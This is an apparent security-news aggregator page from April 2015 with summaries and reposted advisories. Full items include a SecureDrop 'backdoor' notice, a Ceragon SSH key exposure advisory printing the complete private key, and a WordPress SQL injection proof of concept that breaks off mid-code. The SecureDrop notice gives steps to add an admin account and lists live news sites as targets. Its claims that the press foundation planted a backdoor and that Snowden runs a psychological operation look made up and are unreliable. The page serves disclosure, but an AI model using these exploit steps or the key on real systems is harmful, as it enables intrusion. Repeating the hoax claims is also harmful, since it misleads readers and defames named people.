Scanning Alexa's Top 1M for AXFR

April 1, 2015, 2:34 pm

≫ Next: Compromised WordPress sites launch drive-by attacks off Pirate Bay clone

≪ Previous: “Fancybox for WordPress Has Expired” Infection

In this blogpost we will discuss a simple information disclosure problem called unauthorized AXFR. This can be used to leak DNS settings of a particular target, thus revealing internal / private considered DNS entries.

We’ve checked Alexa’s Top 1M for this kind of issue and came to some interesting results.

more here.........https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/

↧

Compromised WordPress sites launch drive-by attacks off Pirate Bay clone

April 1, 2015, 2:35 pm

≫ Next: Recovering deleted records from an SQLite database (updated)

≪ Previous: Scanning Alexa's Top 1M for AXFR

WordPress, the leading Content Management System, is one of cyber criminals’ favourite target when it comes to hacking websites.

Contrary to some beliefs, it’s not because WordPress is a bad or insecurely designed CMS.

As it is often the case, problems often come from the users themselves who aren’t keeping it up to date or like to tear it apart instead of doing proper coding.

While legitimate sites getting hacked is very common, there are times when the patterns and timing are so similar that they indicate an organized effort from the bad guys.

During the past few days, we have been detecting several WordPress sites that were injected with the same iframe. Although we don’t have exact numbers on sites that have been affected, we are assuming that it is a substantial attack.

more here...........https://blog.malwarebytes.org/exploits-2/2015/04/compromised-wordpress-sites-launch-drive-by-attacks-off-pirate-bay-clone/

↧

Recovering deleted records from an SQLite database (updated)

April 1, 2015, 2:38 pm

≫ Next: toolsmith: Rapid Assessment of Web Resources (RAWR!)

≪ Previous: Compromised WordPress sites launch drive-by attacks off Pirate Bay clone

In this slightly lengthy article I want to discuss how we can recover deleted records from an SQLite database, or rather how we can recover all records and distinguish between those that are live in the DB and those that are found in unused areas and do not match a live record. I will also show how the first few bytes of records are regularly overwritten by SQLite structures and how these partial records can be recovered.

more here......http://sandersonforensics.com/forum/content.php?222-Recovering-deleted-records-from-an-SQLite-database

↧

toolsmith: Rapid Assessment of Web Resources (RAWR!)

April 1, 2015, 2:44 pm

≫ Next: OS X & iOS IOKit IOSurfaceRoot (available from sandbox) kernel code execution bug (PoC code included)

≪ Previous: Recovering deleted records from an SQLite database (updated)

Let’s put philosophy into action this month with Adam Byers’ RAWR (NJ Ouchn, our friend @toolswatch, is on the RAWR team too). I asked Adam for the typical tool author’s contribution to the column and was treated to such robust content that I’m going to take a slightly different approach this month we’re I’ll weave in Adam’s feedback throughout as we take RAWR on a walkabout.

more here...........http://holisticinfosec.blogspot.com/2015/04/toolsmith-rapid-assessment-of-web.html

↧

OS X & iOS IOKit IOSurfaceRoot (available from sandbox) kernel code execution bug (PoC code included)

April 1, 2015, 2:47 pm

≫ Next: SECUREDROP >= 0.3 - Possible Backdoor & Privileges Escalation by Unauth User

≪ Previous: toolsmith: Rapid Assessment of Web Resources (RAWR!)

External method 0 of IOSurfaceRoot is IOSurfaceRootUserClient::create_surface. This method expects to receive an xml string which it
deserializes into an OSDictionary. It then passes that dictionary to IOSurfaceRoot::createSurface(task *,OSDictionary *)

here's https://code.google.com/p/google-security-research/issues/detail?id=221 the relevant code

↧

SECUREDROP >= 0.3 - Possible Backdoor & Privileges Escalation by Unauth User

April 1, 2015, 2:50 pm

≫ Next: Vulnerability in site leads to rcrypt packer source code dump

≪ Previous: OS X & iOS IOKit IOSurfaceRoot (available from sandbox) kernel code execution bug (PoC code included)

__________.__  .__  .__        __  .__         ________________   ________   
\_   _____/|  | |  | |__|______/  |_|__| ____   \__    ___/  _  \  \_____  \  
 |    __)_ |  | |  | |  \____ \   __\  |/ ___\    |    | /  /_\  \  /   |   \ 
 |        \|  |_|  |_|  |  |_> >  | |  \  \___    |    |/    |    \/    |    \
/_______  /|____/____/__|   __/|__| |__|\___  >   |____|\____|__  /\_______  /
        \/              |__|                \/                  \/         \/ 
___________                       ___                              
\__    ___/___ _____    _____    / _ \_/\  ___  ______  ______  ___
  |    |_/ __ \\__  \  /     \   \/ \___/  \  \/  /\  \/  /\  \/  /
  |    |\  ___/ / __ \|  Y Y  \             >    <  >    <  >    < 
  |____| \___  >____  /__|_|  /            /__/\_ \/__/\_ \/__/\_ \
             \/     \/      \/                   \/      \/      \/

~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
                SECURITY VULNERABILITY - SECUREDROP >= 0.3
        Possible Backdoor & Privileges Escalation by Unauth User
               2015-04-01 by ~~~ Elliptic TAO Team ~~~
~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

Hello fellow Internet users,

On this great day, where all the tech companies and fresh startups make
fun of you by presenting you incredible new products and try to fool you
into believing in something that is not there.

We will not.

We tell nothing but the truth, we are, in a way, whistleblowers.

~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

~~~Elliptic TAO Team~~~ is the "Nom de plume" of a cyber-warfare
intelligence-gathering unit within the SIGINT forces of a Sovreign State. It
has been active since 2009 to identify, review, monitor, infiltrate, gather
intelligence on computer systems being used by Foreign entities (-:

~~~Elliptic TAO Team~~~ has discovered several critical vulnerabilities
affecting the overly hyped software.
The first vulnerability we are releasing today seems to be a BACKDOOR
PURPOSEDLY (?) INSTALLED BY THE CORE DEV TEAM and present in EVERY INSTALLATION 
of the SecureDrop whistleblowing software which allows ARBITRARY ACCESS, DATA
DOWNLOAD, USER CREDENTIALS COMPROMISE, IMPERSONATION OF JOURNALISTS on the platform.

The backdoor was inserted by the Freedom of the Press Foundation to pose a 
threat on every company, organization, private party using the platform
and to allow a Foreign Force to persistently and programmatically monitor
communications, download content, impersonate administrators.

SecureDrop is an open-source software platform for secure communication between
journalists and sources (whistleblowers). It was originally designed and 
developed by Aaron Swartz and Kevin Poulsen under thename DeadDrop. 
After Aaron Swartz's death, the first instance of the platform
was launched under the name Strongbox by staff at The New Yorker on 15 May
2013. The Freedom of the Press Foundation took over development of DeadDrop
under the name SecureDrop, and has since assisted with its installation (and
backdooring) at several news organizations, including ProPublica, The
Intercept, The Guardian, and The Washington Post.

The Freedom of the Press Foundation (FPF) has subsequently willingly modified the
original secure source code to include a software backdoor that allow any user
in possess of the following information to exploit it and gain ADMINISTRATIVE
POWER on every installation deployed right now on the internet.
It is a travesty that the code of the deceased Aaron Swartz has been meddled with
in such a way.

The FPF has so far successfully infiltrated a variety of different media agencies
both in the country of the United States and abroad. They have managed to do so
by exploiting the trustworthiness of PsyOP Agent Snowden (POPAS) to convince
grassroots organisations and media entities alike that they should use SecureDrop.

POPAS has exposed to the world the supposed wrongdoings of the US government agency NSA,
but it is quite likely that this is a Psycological Operation lead by the United States
to instill fear and untrust in citizens leading them to ask for greater security.
This fear and untrust is used to stear the public towards software solutions that often
do little to improve their actual security and in this particular case, in fact
compromises it.

This just another clue that leads us to believe that the activities of POPAS and FPF
are in reality guided by handlers inside of the US government.

With this backdoor FPF and their possible co-conspirors can:

 * log in, create users, access confidential information
 * disable other administrators
 * change password of other journalists
 * log in as other journalists and see if they received something
 * see how many communications journalists are receiving and when
 * download their data
 * write answers to whistleblowers on behalf of their colleagues
 * delete material of journalists

The timing in which the backdoor was included into the software was also interesting.
It was committed to the source code just after a "security review" from a team of
researchers from the University of Washington.
This also coincided with summer vacations, hence probably not many people were looking
at the commits during that time.
If we were to suggest a better time to commit a backdoor to a piece of software we
would not have advised any differently.

If you have still some question about the willingness to backdoor the software,
please take a look at the Software Repository: after backdooring the 0.3
version other versions previously available have been removed from the download
pool to offer only the backdoored one:

<https://apt.pressfreedomfoundation.org/pool/main/s/securedrop/>

~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
                 WEBSITES EXPLOITABLE BY THE BACKDOOR
~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

These major sites have been confirmed to be exploitable:

* Forbes                                https://safesource.forbes.com
* The Guardian                  https://securedrop.theguardian.com
* The Intercept                 https://firstlook.org/theintercept/securedrop
* The New Yorker                https://projects.newyorker.com/strongbox
* The Washington Post   https://ssl.washingtonpost.com/securedrop
* Wired's Kevin Poulsen poulsensqiv6ocq4.onion
* Greenpeace                    https://www.safesource.org.nz
* ProPublica                    https://securedrop.propublica.org
* BayLeaks                              https://bayleaks.com

Many more are potentially vulnerable such as ExposeFacts, NRKbeta, Project On
Gov't Oversight (POGO), Radio24syv, BalkanLeaks and any other installations
running 0.3.

~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
                           AFFECTED VERSIONS
~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

Affected versions:
 - develop branch since Jul 29, 2014
 - all versions present on their debian package repository:
https://apt.pressfreedomfoundation.org/pool/main/s/securedrop/
   - securedrop-app-code-0.3-amd64.deb
   - securedrop-app-code-0.3.1-amd64.deb

(interesting to note they had also released versions 0.3.2 and 0.3.3, both
vulnerable, but they have been recently removed from the repository)

User privileges needed in order to exploit the vulnerability: unauthenticated user

~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
            AUTHOR OF THE BACKDOOR AND OFFENDING COMMIT
~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

backdoor was added added in the following commit:

<https://github.com/freedomofpress/securedrop/commit/98a99a19d3c7d56a20f6e=
842d7c6aabd3ca8c75d>

~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
                      VULNERABILITY EVIDENCE
~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
Vulnerability Evidence

File /securedrop/journalist.py, lines 125-128, missing @admin_required
decorator
125 @app.route('/admin/add', methods=3D('GET', 'POST'))
126 def admin_add_user():
127     # TODO: process form submission
128     return render_template("admin_add_user.html")

~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
                       STEPS TO REPLICATE
~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

Steps needed in order to reproduce and exploit the backdoor:

Install the development environment: 
(https://www.vagrantup.com/download-archive/v1.6.5.html)

 sudo dpkg -i vagrant.deb
 sudo dpkg-reconfigure virtualbox-dkms
 sudo apt-get install ansible/trusty-backport
 sudo apt-get install ansible
 git clone git () github com:freedomofpress/securedrop.git
 cd securedrop
 vagrant up
 vagrant ssh
 cd /vagrant/securedrop
 python journalist.sh

Exploit the vulnerability to add new admin user:

 open firefox at /admin/add
 type a new user:
     username: th3g4rd1n0fth3guardian
     password: 12345
     mark i'm using a yubikey
     insert the secret: 3132333435363738393031323334353637383930
 press: add user

 Login with the new admin user
     open firefox at /admin/login
     type the login info:
         username: th3g4rd1n0fth3guardian
         password: 12345
         token: 755224
     press: log in

 where 755224 is the first token of the HOTP series associated with the
chosen secret.
 just for reference this is the example data by RFC4226
<https://tools.ietf.org/html/rfc4226>

~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
                            BACKDOOR POWERS
~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

Enjoy the admin power!
 * log in, create users, access confidential information
 * disable other admins
 * change password of other journalists
 * log in as other journalists and see if they have received something
 * see how many communications journalists are receiving and when
 * download journalists data
 * write answers to whistleblowers on behalf of journalists
 * delete material of journalists

Backdoor can be used for:
 * eversdrop on every information submitted to a SecureDrop site
 * proactive monitoring and OSINT info gathering
 * MITM in communication between journalists and whistleblowers
 * erasing evidence and communication (silence whistleblowers)
 * gathering content programmatically from every SecureDrop installation

~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
                          REMEDIATIONS
~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

The Freedom of Press Foundation has willingly removed from download the secure
previous versions, so the only remedation can be:

1. Uninstall and block access on EVERY installation.
2. Execute a complete and meticolous log-analysis to spot backdoor access.
3. Avoid SecureDrop in any critical installation until further tests.
4. Be VERY SUSPICIOUS OF EVERYTHING COMING FROM FPF./
5. Be paranoid. Very paranoid.

___________.__  .__  .__        __  .__         ________________   ________   
\_   _____/|  | |  | |__|______/  |_|__| ____   \__    ___/  _  \  \_____  \  
 |    __)_ |  | |  | |  \____ \   __\  |/ ___\    |    | /  /_\  \  /   |   \ 
 |        \|  |_|  |_|  |  |_> >  | |  \  \___    |    |/    |    \/    |    \
/_______  /|____/____/__|   __/|__| |__|\___  >   |____|\____|__  /\_______  /
        \/              |__|                \/                  \/         \/ 
___________                       ___                              
\__    ___/___ _____    _____    / _ \_/\  ___  ______  ______  ___
  |    |_/ __ \\__  \  /     \   \/ \___/  \  \/  /\  \/  /\  \/  /
  |    |\  ___/ / __ \|  Y Y  \             >    <  >    <  >    < 
  |____| \___  >____  /__|_|  /            /__/\_ \/__/\_ \/__/\_ \
             \/     \/      \/                   \/      \/      \/

12Fsd2VkX1/hlaz3V9/IyX1ftxssdaoEDqJGxJElZzxsgwV7C6H1HXgtu0ddtaAi+
fdfye6jOwdluXjkgWuuJqsYDyO1ergeKlywi2Oh6Lc=

~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
                SECURITY VULNERABILITY - SECUREDROP >= 0.3
        Possible Backdoor & Privileges Escalation by Unauth User
               2015-04-01 by ~~~ Elliptic TAO Team ~~~
~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#

↧

Vulnerability in site leads to rcrypt packer source code dump

April 1, 2015, 2:55 pm

≫ Next: Ceragon FibeAir IP-10 SSH Private Key Exposure (CVE-2015-0936)

≪ Previous: SECUREDROP >= 0.3 - Possible Backdoor & Privileges Escalation by Unauth User

/__/\ /__/\ /_______/\ /_____/\ /___/\/__/\ /_____/\ /_____/\                                   
\::\ \\  \ \\::: _  \ \\:::__\/ \::.\ \\ \ \\::::_\/_\:::_ \ \                                  
 \::\/_\ .\ \\::(_)  \ \\:\ \  __\:: \/_) \ \\:\/___/\\:\ \ \ \                                 
  \:: ___::\ \\:: __  \ \\:\ \/_/\\:. __  ( ( \::___\/_\:\ \ \ \                                
   \: \ \\::\ \\:.\ \  \ \\:\_\ \ \\: \ )  \ \ \:\____/\\:\/.:| |                               
    \__\/ \::\/ \__\/\__\/ \_____\/ \__\/\__\/  \_____\/ \____/_/                               
  _______   __  __                                                                              
/_______/\ /_/\/_/\                                                                             
\::: _  \ \\ \ \ \ \                                                                            
 \::(_)  \/_\:\_\ \ \                                                                           
  \::  _  \ \\::::_\/                                                                           
   \::(_)  \ \ \::\ \                                                                           
  __\_______\/__\__\/______   ______   ______   ______   ______   ______   ______   ______      
/_______/\ /_____/\ /_____/\ /_____/\ /_____/\ /_____/\ /_____/\ /_____/\ /_____/\ /_____/\     
\::: _  \ \\::::_\/_\:::_ \ \\:::_:\ \\:::_ \ \\:::_ \ \\:::_ \ \\::::_\/_\:::_:\ \\:::__\/     
 \::(_)  \/_\:\/___/\\:\ \ \ \\:\_\:\ \\:\ \ \ \\:\ \ \ \\:\ \ \ \\:\/___/\  /_\:\ \\:\ \  __   
  \::  _  \ \\:::._\/ \:\ \ \ \\::__:\ \\:\ \ \ \\:\ \ \ \\:\ \ \ \\_::._\:\ \::_:\ \\:\ \/_/\  
   \::(_)  \ \\:\ \    \:\/.:| |    \ \ \\:\_\ \ \\:\_\ \ \\:\_\ \ \ /____\:\/___\:\ '\:\_\ \ \ 
    \_______\/ \_\/     \____/_/     \_\/ \_____\/ \_____\/ \_____\/ \_____\/\______/  \_____\/

We are BFD9000Sec and we have a mini dump surprise for you all! Website comprimise leads to SOURCE CODE RELEASE!

Website target: http://www.0xrage.com

Source code: rcrypt packer

LFI/RFI fail in module donate.php?sendcash=[vulnerable]&donationfrom=[doesntmatter]

User input not sanitized at all and now your c0de is d|_|mped! Maybe stop using vulnerable WP plugins? lol

We h0pe u enj0y the rel3ase!

- BFD9000Sec!!!!

↧

Ceragon FibeAir IP-10 SSH Private Key Exposure (CVE-2015-0936)

April 1, 2015, 3:10 pm

≫ Next: PDF: TROJAN.DROPPER.BISONAL RAT

≪ Previous: Vulnerability in site leads to rcrypt packer source code dump

# Ceragon FibeAir IP-10 SSH Private Key Exposure (CVE-2015-0936)

## Product Description

Ceragon produces a series of ruggedized, microwave backhaul devices used
to provide connectivity to mobile, IP-based devices; usually, these
devices are found in either large industrial environments, or installed
on towers to provide "middle-mile" connectivity to mobile customers on
behalf of ISPs. In other words, a FibeAir IP-10 typically act as a router
of IP traffic. A compromise on these devices can expose the
communications of all subscribed devices.

## Vulnerability Summary

Several versions of Ceragon FibeAir IP-10 devices have been identified
as having a static, pre-generated public/private keypair associated with
the "mateidu" user available both locally on these devices, and as part
of update packages. This issue is similar to the previously-reported
default root password, reported by Jasper Greve and identified as
[CVE-2015-0924][1]. This vulnerability was [discovered independently][2]
by HD Moore of Rapid7, Inc., while validating CVE-2015-0924.

## Details

There are two important distinctions from CVE-2015-0924. First, the
mateidu user does not, by default, have root-level access permissions on
the device. In order to obtain root access, an attacker would need to
also exercise a local vulnerability.

Second, even if the user was able to easily replace the mateidu
authorized_keys file, later firmware upgrades replace any existing
authorized_keys file with the standard issue key. Distributions of these
update packages containing the corresponding private key are easily
obtained by using simple search terms on any major search engine.

A Metasploit module has been produced and published to demonstrate the
vulnerability, and is made publicly available so device owners and
maintainers may effectively and easily test any mitigation and patching
solution provided or invented.

### Exposed Key Pair

The shipping public key for the mateidu user has the fingerprint,
`27:c6:ad:f9:a6:4d:22:3f:18:b0:3b:df:81:1c:57:45` , and is:

```
ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAwRIdDlHaIqZXND/l1vFT7ue3rc/DvXh2yx5EFtuxGQRHVxGMazDhV4vj5ANGXDQwUYI0iZh6aOVrDy8I/y9/y+YDGCvsnqrDbuPDjW26s2bBXWgUPiC93T3TA6L2KOxhVcl7mljEOIYACRHPpJNYVGhinCxDUH9LxMrdNXgP5Ok=
mateidu@localhost

```

The private key is:

```
-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQDBEh0OUdoiplc0P+XW8VPu57etz8O9eHbLHkQW27EZBEdXEYxr
MOFXi+PkA0ZcNDBRgjSJmHpo5WsPLwj/L3/L5gMYK+yeqsNu48ONbbqzZsFdaBQ+
IL3dPdMDovYo7GFVyXuaWMQ4hgAJEc+kk1hUaGKcLENQf0vEyt01eA/k6QIBIwKB
gQCwhZbohVm5R6AvxWRsv2KuiraQSO16B70ResHpA2AW31crCLrlqQiKjoc23mw3
CyTcztDy1I0stH8j0zts+DpSbYZnWKSb5hxhl/w96yNYPUJaTatgcPB46xOBDsgv
4Lf4GGt3gsQFvuTUArIf6MCJiUn4AQA9Q96QyCH/g4mdiwJBAPHdYgTDiQcpUAbY
SanIpq7XFeKXBPgRbAN57fTwzWVDyFHwvVUrpqc+SSwfzhsaNpE3IpLD9RqOyEr6
B8YrC2UCQQDMWrUeNQsf6xQer2AKw2Q06bTAicetJWz5O8CF2mcpVFYc1VJMkiuV
93gCvQORq4dpApJYZxhigY4k/f46BlU1AkAbpEW3Zs3U7sdRPUo/SiGtlOyO7LAc
WcMzmOf+vG8+xesCDOJwIj7uisaIsy1/cLXHdAPzhBwDCQDyoDtnGty7AkEAnaUP
YHIP5Ww0F6vcYBMSybuaEN9Q5KfXuPOUhIPpLoLjWBJGzVrRKou0WeJElPIJX6Ll
7GzJqxN8SGwqhIiK3wJAOQ2Hm068EicG5WQoS+8+KIE/SVHWmFDvet+f1vgDchvT
uPa5zx2eZ2rxP1pXHAdBSgh799hCF60eZZtlWnNqLg==
-----END RSA PRIVATE KEY-----
```

## Vendor Response

According to the vendor, "A software version that fixes the
vulnerability found in the IP-10 product has been released and is
available to our customers for download through our customer support
resource center. Customers who need assistance are encouraged to contact
a Ceragon customer support representative."

## Timeline

* Jan 16, 2015 (Sat): CVE-2015-0924 disclosed by CERT/CC
* Jan 21, 2015 (Thu): Rapid7 researcher HD Moore discovers this related
vulnerability
* Jan 26, 2015 (Mon): Vendor is notified of the vulnerability
* Feb 02, 2015 (Tue): Vendor confirms report and indicates a fix is
prepared
* Feb 11, 2015 (Thu): CERT/CC is notified, assigns VU#573412 and
CVE-2015-0936.
* Mar 26, 2015 (Thu): Vendor confirms a fix has been released
* Apr 01, 2015 (Wed): [Public disclosure][3] and [Metasploit module][4] is
published

[1]:https://www.kb.cert.org/vuls/id/936356
[2]:https://hdm.io/blog/2015/01/20/partial-disclosure-is-annoying/
[3]:https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15
[4]:https://github.com/rapid7/metasploit-framework/pull/5054

↧

PDF: TROJAN.DROPPER.BISONAL RAT

April 1, 2015, 6:29 pm

≫ Next: RDP Cert Scan with nmap

≪ Previous: Ceragon FibeAir IP-10 SSH Private Key Exposure (CVE-2015-0936)

Bisonal is a malware whose primary purpose is to attack Japanese sites. It functions as
a RAT (remote administrative tool) and communicates with its command-and-control
(C&C) serverwithout the user noticing it. When required, it can upload information
to the server and download new payload from the server for execution. Data within
the binary is fully obfuscated to prevent analysts from easily obtaining them.
Bisonal was first discovered in early 2013. Since then, we have analyzed a few of its
variants, including binary droppers and office document files (xls and docx).
This report aims to unravel the details of Bisonal trojan’s operation and technical
components.The information presented were extracted and analysed using COSEINC
Automated Malware Analysis Lab (CAMAL) sandbox platform

more here.........https://camal.coseinc.com/publish/2013Bisonal.pdf

↧

RDP Cert Scan with nmap

April 2, 2015, 12:24 am

≫ Next: Android apps in sheep's clothing

≪ Previous: PDF: TROJAN.DROPPER.BISONAL RAT

We recently had a red team where we had a lot of RDP endpoints, but not many other endpoints. We had some time pressure, so we looked to see if nmap had a script (we didn’t see one) and wrote a python script that grabbed the cert names. This is a good way to guess at internal hostnames.

more here.......http://webstersprodigy.net/2015/04/01/rdp-cert-scan-with-nmap/

↧

Android apps in sheep's clothing

April 2, 2015, 12:27 am

≫ Next: .Net injection with Mono.Cecil

≪ Previous: RDP Cert Scan with nmap

We identified a security weakness in Android's approach of handling UI elements, circumventing parts of Android's sandboxing approach. While this attack is simple from a technical point of view, the impact of exploiting such a vulnerability is significant. It affects Android based devices as well as Blackberry mobile devices running the Android runtime environment.

more here......http://www.modzero.ch/modlog/archives/2015/04/01/android_apps_in_sheeps_clothing/index.html

↧

.Net injection with Mono.Cecil

April 2, 2015, 12:53 am

≫ Next: Intercepting all System Calls by Hooking KiFastSystemCall

≪ Previous: Android apps in sheep's clothing

This may not be news for everyone but I find it interesting. Mono.Cecil is a impressive work and can provide a lot of cool features such as runtime .NET assembly manipulation. We can inject opcodes (IL instructions) into a target assembly, transforming it as we wish. Here's the test scenario......http://vx.thomazi.me/posts/net-injection-cecil

↧

Intercepting all System Calls by Hooking KiFastSystemCall

April 2, 2015, 1:44 am

≫ Next: Certificate Binary Posters (Part Seven)

≪ Previous: .Net injection with Mono.Cecil

Usually I don't post things like this, but because KiFastSystemCall hooking only works on x86 systems and doesn't work on Windows 8 or above, it no longer has much use in malware. There are also multiple public implementations for this method, just not very elegant, which I hope to correct.

more here.........http://www.malwaretech.com/2015/04/intercepting-all-system-calls-by.html

↧

Certificate Binary Posters (Part Seven)

April 2, 2015, 2:55 am

≫ Next: Instrumenting Android Applications with Frida

≪ Previous: Intercepting all System Calls by Hooking KiFastSystemCall

Certificate revocation has been done in two primary ways Certificate Revocation Lists (CRLs) and the Online Certificate Status Protocol (OCSP) at least until some browsers stopped checking for revocation. However, extended validation (EV) certificates still elicit active revocation checking by most browsers.

CRLs are a list of revoked certificate serial numbers from a given certificate authority.

more here.........http://www.cem.me/20150401-cert-binaries-7.html

↧

Instrumenting Android Applications with Frida

April 2, 2015, 6:53 am

≫ Next: Security Audit Notes - OpenSSL v1.0.2a (latest) Issues - Advanced Information Security Corporation

≪ Previous: Certificate Binary Posters (Part Seven)

As you may have heard, our latest publication the Mobile Application Hacker’s Handbook is out. When you’re writing a book you have to agree a number of things with the publisher beforehand, one of which is the page count, and in our case this was initially set at 600 pages. However what we found when we got close to completion was that we actually had much more content than we had originally anticipated, so some of it still didn’t quite make the cut. One of the areas we wanted to include but didn’t, was how to instrument Android apps using Frida – some of this had already been covered in Chapter 4 with regards to iOS apps and would have meant an overlap in content. However we still think it’s pretty interesting and unique so decided to distill some of this in to a blog post!

more here........http://blog.mdsec.co.uk/2015/04/instrumenting-android-applications-with.html

↧

Security Audit Notes - OpenSSL v1.0.2a (latest) Issues - Advanced Information Security Corporation

April 2, 2015, 7:10 am

≫ Next: Wordpress plugin Simple Ads Manager - SQL Injection

≪ Previous: Instrumenting Android Applications with Frida

-=[Advanced Information Security Corp]=-


Author: Nicholas Lemonias
Report Date: 2/4/2015
Email: lem.nikolas () gmail com

Introduction
 ==========
During a source-code audit of the OpenSSL v1.0.2a (Latest)
implementation for linux; conducted internally by the Advanced
Information Security
Group, instances of insecure function use were observed, which could
lead to a number of attacks.

 Software Overview
 ===============
 OpenSSL is an open-source implementation of the SSL and TLS protocol.
 The core library is written in the C Language, and implements basic
 cryptographic functions, and
 also provides various utility functions. Implementation versions are
 available for most UNIX-like operating systems (including
 Solaris,Linux, Mac OS X and the various open-source BSD operating
 systems), OpenVMS and Microsoft Windows. IBM provides a port for the
 System i (OS/400). OpenSSL is based on SSLeay by Eric Andrew Young and
 Tim Hudson, development of which unofficially ended on December 17,
 1998, when Young and Hudson both started to work for RSA Security.


 PoC 1 - Code Snippet [CWE 362]
 ========================
(.../openssl-1.0.2a/crypto/rand/randfile.c:264)

 out = vms_fopen(file, "rb+", VMS_OPEN_ATTRS);
    if (out == NULL)
        out = vms_fopen(file, "wb", VMS_OPEN_ATTRS);
#else
    if (out == NULL)
        out = fopen(file, "wb");
#endif
    if (out == NULL)
        goto err;

#ifndef NO_CHMOD
    chmod(file, 0600);

Description: The calling function does not provide any security
validation controls, which would effectively prevent a race condition.
The use of open() with the right attributes was agreed.


PoC 2 - Code Snippet [CWE 690]
========================
(.../openssl-1.0.2a/crypto/mem.c:386)

char *CRYPTO_strdup(const char *str, const char *file, int line)
{
char *ret = CRYPTO_malloc(strlen(str) + 1, file, line);

strcpy(ret, str);
return ret;
}

Description: The function call does not make sure that ret is not NULL.


PoC 3 - Code Snippet [CWE 134]
========================
(.../openssl-1.0.2a/ssl/kssl.c:970)

fprintf(stderr, (isprint(adata->contents[i])) ? "%c " : "%02x",
adata->contents[i]);


Description: The function call is prone to a format string attack.


Appendices
==========
Sincere Thanks to the OpenSSL team for their mutual efforts.

References
==========

[1] Oracle (2015). Basic Library Functions - Title: fopen() man pages
section 3: Basic Library Functions [Online]
 Available at: http://docs.oracle.com/cd/E23824_01/html/821-1465/fopen-3c.html#scrolltoc
[Last Accessed 2 April, 2015]

[2] M. Howard, D. LeBlanc Writing Secure Code, Second Edition Microsoft Press

↧

Wordpress plugin Simple Ads Manager - SQL Injection

April 2, 2015, 7:12 am

≫ Next: Wordpress plugin Simple Ads Manager - Information Disclosure

≪ Previous: Security Audit Notes - OpenSSL v1.0.2a (latest) Issues - Advanced Information Security Corporation

#Vulnerability title: Wordpress plugin Simple Ads Manager - SQL Injection
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID: CVE-2015-2824
#Author: Le Hong Minh (minh.h.le () itas vn) & ITAS Team


::PROOF OF CONCEPT::

---SQL INJECTION 1---

+ REQUEST:

POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101
Firefox/28.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/
Content-Length: 270
Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938;
PHPSESSID=kqvtir87g33e2ujkc290l5bmm7;
cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

action=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION
HERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL
INJECTION HERE>&level=3


- Vulnerable file: simple-ads-manager/sam-ajax.php
- Vulnerable code:

          case 'sam_ajax_sam_hits':
                  if(isset($_POST['hits']) && is_array($_POST['hits'])) {
                          $hits = $_POST['hits'];
                          $values = '';
                          $remoteAddr = $_SERVER['REMOTE_ADDR'];
                          foreach($hits as $hit) {
